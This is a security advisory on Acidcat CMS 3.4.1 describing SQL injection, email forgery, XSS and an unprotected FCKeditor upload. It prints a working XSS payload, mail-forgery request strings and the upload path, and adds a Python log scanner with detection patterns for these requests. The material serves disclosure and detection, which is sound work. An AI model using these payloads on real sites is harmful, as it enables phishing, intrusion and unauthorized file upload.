########################## www.BugReport.ir #######################################
#
# AmnPardaz Security Research Team
#
# Title: Acidcat CMS Multiple Vulnerabilities
# Vendor: www.acidcat.com
# Vulnerable Version: 3.4.1
# Exploit: Available
# Impact: High
# Fix: N/A
# Original Advisory: http://bugreport.ir/index.php?/36
###################################################################################


####################
1. Description:
####################
Acidcat CMS is a web site and simple content management system that can be administered through a web browser.

####################
2. Vulnerability:
####################
2.1. There is a SQL injection in "default.asp". By exploiting it, an attacker can obtain usernames and encrypted passwords.
2.1.1. POC:
Check the exploit section.
2.2. There is a logic flaw that lets an attacker send email through the site without any permission.
2.2.1. POC:
Check the exploit section.
2.3. There is a SQL injection in "main_login2.asp". By exploiting it, an attacker can log in to the site.
2.3.1. POC:
Check the exploit section.
2.4. There is an XSS in "/admin/admin_colors_swatch.asp".
2.4.1. POC:
/admin/admin_colors_swatch.asp?field=value='';}alert('XSS');function(){myForm.myText
2.5. There is an FCKeditor instance with no access control, so an attacker can upload files.
2.5.1. POC:
/admin/fckeditor/editor/filemanager/connectors/test.html
####################
3. Exploits:
####################

Original Exploit URL: http://bugreport.ir/index.php?/36/exploit

3.1. An attacker can obtain usernames and passwords:
-------------


-------------
3.2. An attacker can send email without any permission:
-------------
default_mail_aspemail.asp? AcidcatSend=1&From=Fake@Site.com&FromName=FakeAdmin&To=Victim@Email.com&Subject=Forgery&Body=Change your password to 123456!

default_mail_cdosys.asp? AcidcatSend=1&From=Fake@Site.com&FromName=FakeAdmin&To=Victim@Email.com&Subject=Forgery&Body=Change your password to 123456!

default_mail_jmail.asp? AcidcatSend=1&From=Fake@Site.com&FromName=FakeAdmin&To=Victim@Email.com&Subject=Forgery&Body=Change your password to 123456!
-------------
3.3. An attacker can log in to the site:
-------------

-------------
####################
4. Solution:
####################
Edit the source code to ensure that inputs are properly sanitized.
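Until the source is fixed, a log-side check for the scripts named in sections 2.1 to 2.5 is the quickest way to see whether they are being hit. The following is an added example, not part of the advisory or of Acidcat CMS: it scans IIS W3C-style log lines and flags requests matching each finding; the log lines are constructed and the seven-field column layout (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines (not real traffic); assumed layout:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2008-05-01 10:00:01 203.0.113.5 GET /default.asp ID=1 200
2008-05-01 10:00:04 203.0.113.5 GET /main_login2.asp user=admin%27-- 200
2008-05-01 10:00:07 203.0.113.5 GET /default_mail_aspemail.asp AcidcatSend=1&From=Fake%40Site.com&To=Victim%40Email.com 200
2008-05-01 10:00:12 203.0.113.5 GET /admin/admin_colors_swatch.asp field=value%3D%27%27%3B%7Dalert%28%27XSS%27%29 200
2008-05-01 10:00:20 198.51.100.9 GET /admin/fckeditor/editor/filemanager/connectors/test.html - 200
2008-05-01 10:00:25 192.0.2.7 GET /index.asp - 200
"""

# One rule per finding in the advisory: (label, uri-stem pattern, query predicate)
RULES = [
    ("SQL injection attempt (2.1 / 2.3)",
     re.compile(r"^/(default|main_login2)\.asp$", re.I),
     lambda q: re.search(r"'|--|/\*|\bunion\b|\bselect\b", q, re.I) is not None),
    ("unauthenticated mail relay (2.2)",
     re.compile(r"^/default_mail_(aspemail|cdosys|jmail)\.asp$", re.I),
     lambda q: "acidcatsend=1" in q.lower()),
    ("XSS probe on admin colour swatch (2.4)",
     re.compile(r"^/admin/admin_colors_swatch\.asp$", re.I),
     lambda q: re.search(r"[<>'\";]|alert\s*\(", q) is not None),
    ("FCKeditor connector reached (2.5)",
     re.compile(r"^/admin/fckeditor/editor/filemanager/connectors/", re.I),
     lambda q: True),
]


def scan(log_text):
    """Return (client_ip, label, uri_stem) for every log line that matches a rule."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 7 or line.startswith("#"):   # skip short lines and W3C headers
            continue
        ip, stem, query = parts[2], parts[4], parts[5]
        query = "" if query == "-" else unquote_plus(query)   # decode before matching
        for label, path_re, pred in RULES:
            if path_re.search(stem) and pred(query):
                hits.append((ip, label, stem))
    return hits
```

Calling scan(SAMPLE_LOG) reports four of the six constructed lines; the ordinary /default.asp?ID=1 and /index.asp requests are left alone.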
####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com